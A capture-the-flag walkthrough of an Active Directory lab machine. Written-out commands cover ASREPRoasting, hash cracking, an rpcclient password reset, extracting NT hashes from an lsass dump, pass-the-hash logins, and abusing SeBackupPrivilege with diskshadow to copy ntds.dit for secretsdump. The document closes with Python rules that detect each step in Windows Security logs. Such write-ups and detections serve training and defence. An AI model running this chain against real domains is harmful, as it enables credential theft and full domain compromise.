
0. Preface

If you didn’t know that you could reset passwords through RPCClient, now you do. I also never had a chance to play with SeBackupPrivilege tokens, so this was a very nice learning opportunity as well.

In this box, we will be tackling:

  1. ASREPRoasting to get valid users and TGTs
  2. Using RPCClient to reset passwords
  3. Reading memory dump of lsass
  4. Abusing SeBackupPrivilege token and dumping NTDS.dit

1. Preliminary NMAP Scan

sudo nmap -sC -sV -oN nmap.txt -p- 10.10.10.192 -v



This is a domain controller with the hostname DC01 and the domain name blackfield.local. WinRM (port 5985) is open, so we can likely use it to gain access to the domain controller later on, once we have valid credentials.

2. Active Directory Enumeration

Let’s start off with anonymous SMB enumeration.


Let’s try going into the profiles$ share.


This gives us a ton of potential usernames. Let’s try to ASREPRoast these usernames.

GetNPUsers.py blackfield.local/ -no-pass -usersfile userlist.txt -dc-ip 10.10.10.192


Awesome. We got a hit. Out of the whole list, it seems like only support, audit2020 and svc_backup are valid users, and only support has Kerberos pre-authentication disabled, so we receive an AS-REP for that account. Let's crack the AS-REP hash for support using john.

sudo john --wordlist:/usr/share/wordlists/rockyou.txt support.hash
sudo john --show support.hash


We have our first set of credentials - support:#00^BlackKnight

3. RPCClient Password Reset

Let’s use rpcclient to further enumerate the domain controller using the credentials we got earlier.

rpcclient -U 'blackfield.local/support%#00^BlackKnight' 10.10.10.192

enumalsgroups builtin
queryaliasmem builtin 0x244
lookupsids S-1-5-21-4194615774-2175524697-3563712290-1413


We find that svc_backup is a member of the Remote Management Users group (alias 0x244 in the builtin domain), which will give us WinRM access to the domain controller if we manage to get the password.

Backtracking a bit, there is a forensic share with the comment "forensic/audit share". Quick guess: this is accessible using the audit2020 user.

Let's see if we can reset the password for audit2020 using rpcclient. setuserinfo2 with information level 23 sets a new password on the target account; this only succeeds because support holds a password-reset right over audit2020.

rpcclient -U 'blackfield.local/support%#00^BlackKnight' 10.10.10.192

setuserinfo2 audit2020 23 'P@$$w0rd12345'


Awesome, seems to be successful.

4. Extracting NTHashes from LSASS Memory Dump

Let’s see what the audit2020 user can access using smbmap.

smbmap -u 'audit2020' -d 'blackfield.local' -p 'P@$$w0rd12345' -H 10.10.10.192


We guessed right. Let’s download everything from the forensic share and enumerate it offline.


There are a lot of files in here, so let's focus on the only one that matters.

There is a folder that contains the memory dumps of some processes.


What sticks out is lsass.zip, a memory dump of the LSASS process. LSASS caches the credential material (including NT hashes) of every user who was logged on at the time the dump was taken.

Let’s extract it.


Now that we have the dump file, let’s use pypykatz to dump the hashes from it.

pypykatz lsa minidump lsass.DMP >> lsass-dump.txt


Awesome, we got the NT hashes of svc_backup and administrator.


5. Exploiting Backup Privileges

First, let’s try to pass the administrator hash using evil-winrm.

evil-winrm -i 10.10.10.192 -u 'blackfield.local\administrator' -H 7f1e4ff8c6a8e6b6fcae2d9c0572cd62


Seems like the password has been changed since the dump. Let’s try svc_backup next.

evil-winrm -i 10.10.10.192 -u 'blackfield.local\svc_backup' -H 9658d1d1dcd9250115e2205d9f48400d


We’re in. Let’s grab the user flag from the desktop first.

Next, let’s see what rights this user has.


We see that it holds both SeBackupPrivilege and SeRestorePrivilege. SeBackupPrivilege lets a process read any file on the system regardless of its ACL, and SeRestorePrivilege lets it write to any file.

We should be able to exploit these privileges by copying out ntds.dit, the Active Directory database that stores every domain account's LM/NT hash, and extracting the administrator hash from it.

After a fair bit of Googling, we find a GitHub repository which contains PowerShell cmdlets that let us exploit SeBackupPrivilege. We also find a GitHub repository which walks through how to create a shadow copy of the domain controller's drive, since ntds.dit is locked by the directory service and cannot be copied out normally.

First, let's create a script.txt file with the following content, which tells diskshadow to create a shadow copy of the C: volume and expose it as a drive letter.

set context persistent nowriters
set metadata c:\windows\system32\spool\drivers\color\example.cab
set verbose on
begin backup
add volume c: alias mydrive

create

expose %mydrive% w:
end backup

diskshadow expects Windows (CRLF) line endings, so run unix2dos script.txt to convert the file to DOS format and avoid parsing errors. Now, let's upload the file to the remote session using evil-winrm.


Now, we can run diskshadow /s script.txt to trigger the shadow copy backup, which will be exposed on w:\.


Before we can actually copy out ntds.dit from the shadow copy backup, we will need to make use of the PowerShell cmdlets found in the first Github repository earlier.

We can upload the whole SeBackupPrivilegeCmdlets folder into the server using evil-winrm.


Next, we can import the modules found in the /bin/debug folder. You can run Get-Module after this to verify that they have been imported successfully.

Import-Module .\SeBackupPrivilegeCmdLets.dll
Import-Module .\SeBackupPrivilegeUtils.dll


Next, navigate to W:\windows\ntds.


Copy the ntds.dit file using Copy-FileSeBackupPrivilege, but ensure that the destination filename is different or it will not work.

Copy-FileSeBackupPrivilege ntds.dit $env:LOCALAPPDATA\microsoft\database

We also need the HKLM\SYSTEM registry hive, since it holds the boot key that encrypts the hashes inside ntds.dit, so let's grab that too.

reg save HKLM\SYSTEM $env:LOCALAPPDATA\microsoft\sys

Let’s download everything back to our machine.



Now, let’s use secretsdump.py to dump ntds.dit.

secretsdump.py -system sys -ntds database LOCAL >> secretsdump.txt


Now we can finally pass the (real) administrator hash and get the root flag.
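From the blue-team side, each step of this chain (the AS-REP request for support, the rpcclient password reset of audit2020, the svc_backup logon carrying SeBackupPrivilege, and the diskshadow run) leaves a distinct entry in the domain controller's Security log. The following is an added example, not code from the original writeup, that runs those four detections over constructed event records; the field names match the real EventData fields, while the sample values and the allowlist are constructed.

```python
# Added example, not from the original writeup: detections for the traces this
# chain leaves in the Windows Security log, over constructed event records.
EXPECTED_BACKUP_ACCOUNTS = {"administrator"}   # constructed allowlist

def asrep_roastable_tgt(ev):
    # 4768 with Pre-Authentication Type 0: TGT issued without pre-auth (what
    # GetNPUsers.py needs); RC4 (0x17) makes the AS-REP cheap to crack offline.
    return (ev["EventID"] == 4768 and ev.get("PreAuthType") == "0"
            and ev.get("TicketEncryptionType") == "0x17")

def password_reset_by_other(ev):
    # 4724: one principal reset another account's password (setuserinfo2 path).
    return (ev["EventID"] == 4724
            and ev["SubjectUserName"].lower() != ev["TargetUserName"].lower())

def backup_privilege_outside_allowlist(ev):
    # 4672: logon granted SeBackup/SeRestore to an account not expected to hold it.
    privs = set(ev.get("PrivilegeList", "").split())
    return (ev["EventID"] == 4672
            and bool(privs & {"SeBackupPrivilege", "SeRestorePrivilege"})
            and ev["SubjectUserName"].lower() not in EXPECTED_BACKUP_ACCOUNTS)

def diskshadow_with_script(ev):
    # 4688 (needs command-line auditing): diskshadow driven by a script file.
    cmd = ev.get("CommandLine", "").lower()
    return ev["EventID"] == 4688 and "diskshadow" in cmd and "/s" in cmd.split()

RULES = (asrep_roastable_tgt, password_reset_by_other,
         backup_privilege_outside_allowlist, diskshadow_with_script)

def triage(events):
    # (rule, subject account, target account) for every matching event
    return [(rule.__name__, ev.get("SubjectUserName", "-"), ev.get("TargetUserName", "-"))
            for ev in events for rule in RULES if rule(ev)]

# Constructed sample events mirroring the steps of the walkthrough
SAMPLE_EVENTS = [
    {"EventID": 4768, "TargetUserName": "support", "PreAuthType": "0",
     "TicketEncryptionType": "0x17", "IpAddress": "10.10.14.5"},
    {"EventID": 4768, "TargetUserName": "jdoe", "PreAuthType": "2",
     "TicketEncryptionType": "0x12", "IpAddress": "10.10.10.50"},
    {"EventID": 4724, "SubjectUserName": "support", "TargetUserName": "audit2020"},
    {"EventID": 4672, "SubjectUserName": "svc_backup",
     "PrivilegeList": "SeBackupPrivilege SeRestorePrivilege SeShutdownPrivilege"},
    {"EventID": 4672, "SubjectUserName": "Administrator",
     "PrivilegeList": "SeBackupPrivilege SeDebugPrivilege"},
    {"EventID": 4688, "SubjectUserName": "svc_backup", "CommandLine": "diskshadow /s script.txt"},
]
```

Running triage(SAMPLE_EVENTS) yields one hit per step of the chain and none for the pre-authenticated AES logon or the allowlisted administrator; the 4724 rule is the cheapest win, since a non-helpdesk account resetting someone else's password is rarely legitimate.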
